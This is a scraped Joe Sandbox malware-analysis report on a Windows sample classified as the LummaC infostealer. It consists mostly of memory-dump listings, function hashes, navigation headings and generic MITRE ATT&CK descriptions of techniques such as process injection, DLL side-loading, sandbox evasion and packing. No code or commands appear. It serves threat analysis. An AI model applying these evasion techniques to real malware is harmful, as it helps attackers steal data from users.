Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1967c07167d310db7f7ffc807523eb46a662f2f1a813976b47094fac045f9e80
Instruction ID: 05410605a2398b9b205a3ff67b45c7d392b44e108d4b3b560f0e5aa691123a18
Opcode Fuzzy Hash: 1967c07167d310db7f7ffc807523eb46a662f2f1a813976b47094fac045f9e80
Instruction Fuzzy Hash: 492106F7F526254BF3544836CD98366214397E5324F2F82788B5C6BBCAD83E5D0B5284

Function 001CB0FF Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8cde30b38051111b914f39dc90d35f47992e4e759a7a3489bbc03c7631f0c6
Instruction ID: 4a9d933dc98923c8801bdcf9951493f6130a24c11ae0e474b08670b6db874a77
Opcode Fuzzy Hash: 3a8cde30b38051111b914f39dc90d35f47992e4e759a7a3489bbc03c7631f0c6
Instruction Fuzzy Hash: 5F21E7B110810EDFEB149F54D449BBE7BE4FB14314F55052DE985C1D80D77A8CA4CB9A

Function 001A6210 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: a13e3e0e901463691b6bed2fa3dae612a2f56f8eaf4939430ba6054e8e8029e9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 9111E937A051D40ED3168D3C84406B5BFE30AD3734B1D439AF4B99B2D2D7228D8A9354

Function 0022D256 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc2f807327ec8ece9bd9041deb37bd095b43d9d24682fc4e11389d8bcadd5d0
Instruction ID: 1d7feeb6dca2dff7ab925d07e2aa59bc612ec9827af15da6a34e0d780e6dcea9
Opcode Fuzzy Hash: 3fc2f807327ec8ece9bd9041deb37bd095b43d9d24682fc4e11389d8bcadd5d0
Instruction Fuzzy Hash: 4B1127B3F0122007F7944879CC593A2A582AB95320F2B8239CE8DAB7C5DCBE5D4943C4

Function 0018C300 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
Instruction ID: 4bf8fe1aabf9b6b33844f5c7bcd4411373240daa6f688138b76673ce7d20cf73
Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
Instruction Fuzzy Hash: F5F03C60104B918AD7328F398564373FFF0AB23228F545A8CC9E357AD2D376E10A8B94

Function 0019E0DA Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction ID: 9ab5c6ef6f74e04c6d5f854680008b50a607ee6b2608e22ab0abd3503ec4059b
Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction Fuzzy Hash: CCF065105087E28ADF238B3E84606B2AFE0AB63120B181BD5C8E19B2C7C3159596C366

Function 0019D116 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1874872418.0000000000171000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.1874853840.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874872418.00000000001B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874924216.00000000001C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.00000000001C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1874940679.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875208317.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875376292.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1875396517.00000000005F2000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_Ebgl8jb6CW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98206342643a0b84ce19fbf3da4f6c22924ea1245db3a70f772484e852056e96
Instruction ID: 67519819f4e3fba3af188349fea67e137dce527c6d01bc742dee285ce2342da1
Opcode Fuzzy Hash: 98206342643a0b84ce19fbf3da4f6c22924ea1245db3a70f772484e852056e96
Instruction Fuzzy Hash: C301F4706442829BD304CF38CDE0666FBA1EB96364F48CB9CC4568B796C734D882C795

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ebgl8jb6CW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
Ebgl8jb6CW.exe

Function 0017B100 Relevance: 19.2, Strings: 15, Instructions: 425
COMMON

Function 00178600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356
COMMON

Function 001AE110 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 001B1720 Relevance: 1.4, Strings: 1, Instructions: 158
COMMON

Function 00179D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
libraryCOMMON

Function 0017EF53 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Function 001AE0A0 Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Function 0017EC77 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 00179EB7 Relevance: 1.5, APIs: 1, Instructions: 18
networkCOMMON

Function 001AC570 Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Function 001AC55C Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON